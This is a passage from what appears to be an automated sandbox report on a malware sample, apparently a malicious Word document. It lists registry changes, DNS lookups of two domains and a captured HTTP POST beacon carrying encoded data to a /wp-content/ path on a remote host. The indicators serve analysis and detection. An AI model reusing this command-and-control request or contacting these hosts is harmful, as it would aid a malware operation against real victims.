1425. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Playbill",
1426. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\PMingLiU",
1427. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\PMingLiU-ExtB",
1428. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Poor Richard",
1429. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Pristina",
1430. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Raavi",
1431. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rage Italic",
1432. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Ravie",
1433. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell",
1434. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell Condensed",
1435. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rockwell Extra Bold",
1436. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Rod",
1437. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Sakkal Majalla",
1438. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Script MT Bold",
1439. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe Print",
1440. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe Script",
1441. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI",
1442. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Light",
1443. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Semibold",
1444. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Semilight",
1445. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Segoe UI Symbol",
1446. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Shonar Bangla",
1447. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Showcard Gothic",
1448. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Shruti",
1449. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimHei",
1450. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Simplified Arabic",
1451. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Simplified Arabic Fixed",
1452. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimSun",
1453. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\SimSun-ExtB",
1454. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Snap ITC",
1455. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Stencil",
1456. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Sylfaen",
1457. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Symbol",
1458. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tahoma",
1459. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tempus Sans ITC",
1460. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Times New Roman",
1461. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Traditional Arabic",
1462. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Trebuchet MS",
1463. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tunga",
1464. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT",
1465. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT Condensed",
1466. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Tw Cen MT Condensed Extra Bold",
1467. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Utsaah",
1468. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vani",
1469. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Verdana",
1470. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vijaya",
1471. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Viner Hand ITC",
1472. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vivaldi",
1473. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vladimir Script",
1474. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Vrinda",
1475. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Webdings",
1476. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wide Latin",
1477. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings",
1478. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings 2",
1479. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\MathFonts\\Wingdings 3",
1480. "HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Installer\\UserData\\S-1-5-18\\Products\\00005109E60090400000000000F01FEC\\Usage\\EquationEditorFilesIntl_1033",
1481. "HKEY_CURRENT_USER\\Software\\Microsoft\\Equation Editor\\3.0\\Options",
1482. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\FileExts\\.doc\\OpenWithList\\MRUList",
1483. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\7P5N40RS-N0SO-4OSP-874N-P0S2R0O9SN8R\\Zvpebfbsg Bssvpr\\Bssvpr15\\JVAJBEQ.RKR",
1484. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\HRZR_PGYFRFFVBA",
1485. "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\CEBFF5CD-ACE2-4F4F-9178-9926F41749EA\\Count\\1NP14R77-02R7-4R5Q-O744-2RO1NR5198O7\\pzq.rkr"
1486.  
1487.  
1488. * Deleted Registry Keys:
1489. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\9q*",
1490. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Word\\Resiliency\\StartupItems\\q5(",
1491. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\CacheReady",
1492. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastRequest",
1493. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\LastUpdate",
1494. "HKEY_CURRENT_USER\\Software\\Microsoft\\Office\\15.0\\Common\\ServicesManagerCache\\ServicesCatalog\\NextUpdate",
1495. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&1\\CustomPropertyHwIdKey",
1496. "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\Enum\\PCIIDE\\IDECHANNEL\\4&2617AEAE&0&0\\CustomPropertyHwIdKey"
1497.  
1498.  
1499. * DNS Communications:
1500.  
1501. "type": "A",
1502. "request": "hirecarvietnam.com",
1503. "answers":
1504.  
1505. "data": "163.44.207.86",
1506. "type": "A"
1507.  
1508.  
1509.  
1510.  
1511. "type": "A",
1512. "request": "romanone.com",
1513. "answers":
1514.  
1515. "data": "195.201.152.3",
1516. "type": "A"
1517.  
1518.  
1519.  
1520.  
1521.  
1522. * Domains:
1523.  
1524. "ip": "163.44.207.86",
1525. "domain": "hirecarvietnam.com"
1526.  
1527.  
1528. "ip": "195.201.152.3",
1529. "domain": "romanone.com"
1530.  
1531.  
1532.  
1533. * Network Communication - ICMP:
1534.  
1535. * Network Communication - HTTP:
1536.  
1537. "count": 1,
1538. "body": "J/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
1539. "uri": "http://romanone.com:443/wp-content/okoye/32/index.php",
1540. "user-agent": "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)",
1541. "method": "POST",
1542. "host": "romanone.com",
1543. "version": "1.0",
1544. "path": "/wp-content/okoye/32/index.php",
1545. "data": "POST /wp-content/okoye/32/index.php HTTP/1.0\r\nHost: romanone.com\r\nConnection: close\r\nUser-agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)\r\nContent-Length: 105\r\n\r\nJ/\\xfb5/\\xfb<L\\x8a(9\\xf0N/\\xfb;/\\xfaI/\\xfb=H\\x8aH/\\xfb;O\\xed>;\\xed>2\\xed?N\\xed><\\x8eN/\\xfb4H\\xed>?\\x8cO/\\xfaI/\\xfb8/\\xfb>/\\xfb;N\\x89(9\\xfc(9\\xfd(9\\xfd(8\\x8c(9\\xf1(9\\xfb(9\\xfb(9\\xf1(9\\xfc(9\\xfe(9\\xff(9\\xfa(9\\xfe",
1546. "port": 443
1547.  
1548.  
1549.  
1550. * Network Communication - SMTP:
1551.  
1552. * Network Communication - Hosts:
1553.  
1554. "country_name": "Germany",
1555. "ip": "195.201.152.3",
1556. "inaddrarpa": "",
1557. "hostname": "romanone.com"
1558.  
1559.  
1560. "country_name": "Vietnam",
1561. "ip": "163.44.207.86",
1562. "inaddrarpa": "",
1563. "hostname": "hirecarvietnam.com"
1564.  
1565.  
1566.  
1567. * Network Communication - IRC: